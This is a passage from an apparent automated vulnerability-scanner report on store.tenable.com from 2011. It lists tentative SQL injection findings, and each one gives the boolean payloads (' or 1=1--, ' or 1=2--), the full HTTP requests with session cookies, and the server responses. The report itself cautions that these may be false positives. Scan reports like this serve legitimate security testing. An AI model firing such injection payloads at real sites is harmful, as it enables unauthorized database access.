...[SNIP]...

1.9. https://store.tenable.com/includes/templates/tenable/css/t.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/css/t.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 45960039'%20or%201%3d1--%20 and 45960039'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes45960039'%20or%201%3d1--%20/templates/tenable/css/t.css?v=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:39 GMT
Server: Apache
Content-Length: 257
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes45960039' or 1=1-- /templates/tenable/css/t.css
on this server.</p>
</body></html>

Request 2

GET /includes45960039'%20or%201%3d2--%20/templates/tenable/css/t.css?v=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:48:39 GMT
Server: Apache
Content-Length: 253
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /includes45960039' or 1=2-- /templates/tenable/css/t.css was not found on this server.</p>
</body></html>

1.10. https://store.tenable.com/includes/templates/tenable/css/t.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/css/t.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16156446%20or%201%3d1--%20 and 16156446%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes/templates/tenable/css/t.css?v=1&116156446%20or%201%3d1--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:31 GMT
Server: Apache
Content-Length: 238
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes/templates/tenable/css/t.css
on this server.</p>
</body></html>

Request 2

GET /includes/templates/tenable/css/t.css?v=1&116156446%20or%201%3d2--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:48:32 GMT
Server: Apache
Last-Modified: Fri, 14 Jan 2011 16:46:56 GMT
ETag: "12ee30-caf6-2e9b8000"
Accept-Ranges: bytes
Content-Length: 51958
Connection: close
Content-Type: text/css

/**
* !! IMPORTANT !!
* Please make sure that whenever changes are made to this file that it is
* recompressed and saved in T.MIN.CSS as well. This file is NOT used by the
* public-facing site, it is only called within the administrative environment.
*/
@media screen, print {
/**
* @section YUI Reset;
* @note uncompressed available at ./uncompressed/reset.css;
**/
html{color:#000;background:#FFF;}body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,button,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}address,caption,cite,code,dfn,em,strong,th,var,optgroup{font-style:inherit;font-weight:inherit;}del,ins{text-decoration:none;}li{list-style:none;}caption,th{text-align:left;}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;}q:before,q:after{content:'';}abbr,acronym{border:0;font-variant:normal;}sup{vertical-align:baseline;}sub{vertical-align:baseline;}legend{color:#000;}input,button,textarea,select,optgroup,option{font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;}input,button,textarea,select{*font-size:100%;}


/**
* @section 960 grid; 12 & 16 column; 10px margin;
* @note uncompressed available at ./uncompressed/960margin10.css;
**/
.container_12,.container_16{margin-left:auto;margin-right:auto;width:960px}.grid_1,.grid_2,.grid_3,.grid_4,.grid_5,.grid_6,.grid_7,.grid_8,.grid_9,.grid_10,.grid_11,.grid_12,.grid_13,.grid_14,.grid_15,.grid_16{display:inline;float:left;margin-left:10px;margin-right:10px}.alpha{margin-left:0}.omega{margin-right:0}.container_12 .grid_1 {width:60px}.container_12 .grid_2 {width:140px}.container_12 .grid_3 {width:220px}.container_
...[SNIP]...

1.11. https://store.tenable.com/includes/templates/tenable/css/t.css [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/css/t.css

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 12532255%20or%201%3d1--%20 and 12532255%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes/templates/tenable/css/t.css?v=112532255%20or%201%3d1--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:10 GMT
Server: Apache
Content-Length: 238
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes/templates/tenable/css/t.css
on this server.</p>
</body></html>

Request 2

GET /includes/templates/tenable/css/t.css?v=112532255%20or%201%3d2--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:48:10 GMT
Server: Apache
Last-Modified: Fri, 14 Jan 2011 16:46:56 GMT
ETag: "12ee30-caf6-2e9b8000"
Accept-Ranges: bytes
Content-Length: 51958
Connection: close
Content-Type: text/css

/**
* !! IMPORTANT !!
* Please make sure that whenever changes are made to this file that it is
* recompressed and saved in T.MIN.CSS as well. This file is NOT used by the
* public-facing site, it is only called within the administrative environment.
*/
@media screen, print {
/**
* @section YUI Reset;
* @note uncompressed available at ./uncompressed/reset.css;
**/
html{color:#000;background:#FFF;}body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,button,textarea,p,blockquote,th,td{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}address,caption,cite,code,dfn,em,strong,th,var,optgroup{font-style:inherit;font-weight:inherit;}del,ins{text-decoration:none;}li{list-style:none;}caption,th{text-align:left;}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal;}q:before,q:after{content:'';}abbr,acronym{border:0;font-variant:normal;}sup{vertical-align:baseline;}sub{vertical-align:baseline;}legend{color:#000;}input,button,textarea,select,optgroup,option{font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;}input,button,textarea,select{*font-size:100%;}


/**
* @section 960 grid; 12 & 16 column; 10px margin;
* @note uncompressed available at ./uncompressed/960margin10.css;
**/
.container_12,.container_16{margin-left:auto;margin-right:auto;width:960px}.grid_1,.grid_2,.grid_3,.grid_4,.grid_5,.grid_6,.grid_7,.grid_8,.grid_9,.grid_10,.grid_11,.grid_12,.grid_13,.grid_14,.grid_15,.grid_16{display:inline;float:left;margin-left:10px;margin-right:10px}.alpha{margin-left:0}.omega{margin-right:0}.container_12 .grid_1 {width:60px}.container_12 .grid_2 {width:140px}.container_12 .grid_3 {width:220px}.container_
...[SNIP]...

1.12. https://store.tenable.com/includes/templates/tenable/img/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/img/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 82626339'%20or%201%3d1--%20 and 82626339'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes82626339'%20or%201%3d1--%20/templates/tenable/img/favicon.ico HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:49:34 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes82626339' or 1=1-- /templates/tenable/img/favicon.ico
on this server.</p>
</body></html>

Request 2

GET /includes82626339'%20or%201%3d2--%20/templates/tenable/img/favicon.ico HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:49:34 GMT
Server: Apache
Content-Length: 259
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /includes82626339' or 1=2-- /templates/tenable/img/favicon.ico was not found on this server.</p>
</body></html>

1.13. https://store.tenable.com/includes/templates/tenable/jscript/t.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/jscript/t.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 76127428'%20or%201%3d1--%20 and 76127428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes76127428'%20or%201%3d1--%20/templates/tenable/jscript/t.js?v=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:43 GMT
Server: Apache
Content-Length: 260
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes76127428' or 1=1-- /templates/tenable/jscript/t.js
on this server.</p>
</body></html>

Request 2

GET /includes76127428'%20or%201%3d2--%20/templates/tenable/jscript/t.js?v=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:48:43 GMT
Server: Apache
Content-Length: 256
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /includes76127428' or 1=2-- /templates/tenable/jscript/t.js was not found on this server.</p>
</body></html>

1.14. https://store.tenable.com/includes/templates/tenable/jscript/t.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/jscript/t.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11526221%20or%201%3d1--%20 and 11526221%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes/templates/tenable/jscript/t.js?v=1&111526221%20or%201%3d1--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:37 GMT
Server: Apache
Content-Length: 241
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes/templates/tenable/jscript/t.js
on this server.</p>
</body></html>

Request 2

GET /includes/templates/tenable/jscript/t.js?v=1&111526221%20or%201%3d2--%20=1 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:48:37 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 18:50:02 GMT
ETag: "12ee26-293d-5b094a80"
Accept-Ranges: bytes
Content-Length: 10557
Connection: close
Content-Type: application/x-javascript

// helper classes;
jQuery(function($){
// browser font inconsistantcies;
if($.browser.safari === true) {
$('body').addClass('webkit');
}
if(navigator.userAgent.indexOf('Win') > 0) {
$('body').addClass('windows');
}

// IE lack of CSS3 support;
$('div.moduleSubsection:last-child').addClass('last-child');
$('div.moduleProduct:last-child').addClass('last-child');
$('div.moduleCarousel:last-child').addClass('last-child');
$('#nav li:first-child').addClass('first-child');
$('#nav li:last-child').addClass('last-child');

if($.browser.msie === true && parseInt($.browser.version, 10) < 7) {
$('input[type=text]').addClass('text');
$('input[type=submit]').addClass('submit');
}
});

// #navMain interaction;
jQuery(function($){
function show(){
$('#navMain li.hover').removeClass('hover');
       $(this).addClass('hover');
   }
function hide(){
       $(this).removeClass('hover');
   }

$('#navMain>ul>li').hoverIntent({
       sensitivity: 7, /* number = sensitivity threshold (must be 1 or higher) */
       interval: 0, /* number = milliseconds for onMouseOver polling interval */
       over: show, /* function = onMouseOver callback (REQUIRED) */
       timeout: 500, /* number = milliseconds delay before onMouseOut */
       out: hide /* function = onMouseOut callback (REQUIRED) */
   });
});

// #navSearch interaction;
jQuery(function($){
$('#navSearch label').each(function(i){ // loop through each LABEL to hide;
var obj = '#' + $(this).attr('for'); // find the TARGET form field;
var val = $(this).html(); // record the
...[SNIP]...

1.15. https://store.tenable.com/includes/templates/tenable/jscript/t.js [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /includes/templates/tenable/jscript/t.js

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 16089195%20or%201%3d1--%20 and 16089195%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /includes/templates/tenable/jscript/t.js?v=116089195%20or%201%3d1--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:48:22 GMT
Server: Apache
Content-Length: 241
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /includes/templates/tenable/jscript/t.js
on this server.</p>
</body></html>

Request 2

GET /includes/templates/tenable/jscript/t.js?v=116089195%20or%201%3d2--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:48:22 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 18:50:02 GMT
ETag: "12ee26-293d-5b094a80"
Accept-Ranges: bytes
Content-Length: 10557
Connection: close
Content-Type: application/x-javascript

// helper classes;
jQuery(function($){
// browser font inconsistantcies;
if($.browser.safari === true) {
$('body').addClass('webkit');
}
if(navigator.userAgent.indexOf('Win') > 0) {
$('body').addClass('windows');
}

// IE lack of CSS3 support;
$('div.moduleSubsection:last-child').addClass('last-child');
$('div.moduleProduct:last-child').addClass('last-child');
$('div.moduleCarousel:last-child').addClass('last-child');
$('#nav li:first-child').addClass('first-child');
$('#nav li:last-child').addClass('last-child');

if($.browser.msie === true && parseInt($.browser.version, 10) < 7) {
$('input[type=text]').addClass('text');
$('input[type=submit]').addClass('submit');
}
});

// #navMain interaction;
jQuery(function($){
function show(){
$('#navMain li.hover').removeClass('hover');
       $(this).addClass('hover');
   }
function hide(){
       $(this).removeClass('hover');
   }

$('#navMain>ul>li').hoverIntent({
       sensitivity: 7, /* number = sensitivity threshold (must be 1 or higher) */
       interval: 0, /* number = milliseconds for onMouseOver polling interval */
       over: show, /* function = onMouseOver callback (REQUIRED) */
       timeout: 500, /* number = milliseconds delay before onMouseOut */
       out: hide /* function = onMouseOut callback (REQUIRED) */
   });
});

// #navSearch interaction;
jQuery(function($){
$('#navSearch label').each(function(i){ // loop through each LABEL to hide;
var obj = '#' + $(this).attr('for'); // find the TARGET form field;
var val = $(this).html(); // record the
...[SNIP]...

1.16. https://store.tenable.com/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 32125367'%20or%201%3d1--%20 and 32125367'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php32125367'%20or%201%3d1--%20?main_page=product_info&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:53:21 GMT
Server: Apache
Content-Length: 230
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php32125367' or 1=1--
on this server.</p>
</body></html>

Request 2

GET /index.php32125367'%20or%201%3d2--%20?main_page=product_info&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:53:21 GMT
Server: Apache
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php32125367' or 1=2-- was not found on this server.</p>
</body></html>

1.17. https://store.tenable.com/index.php [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The action parameter appears to be vulnerable to SQL injection attacks. The payloads 11258655'%20or%201%3d1--%20 and 11258655'%20or%201%3d2--%20 were each submitted in the action parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /index.php?main_page=product_info&cPath=5&products_id=9&action=add_product11258655'%20or%201%3d1--%20&zenid=5717419e1ab4b29ffbd339c41541e7c7 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
Origin: https://store.tenable.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOO8tZKUWmYxANA9
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
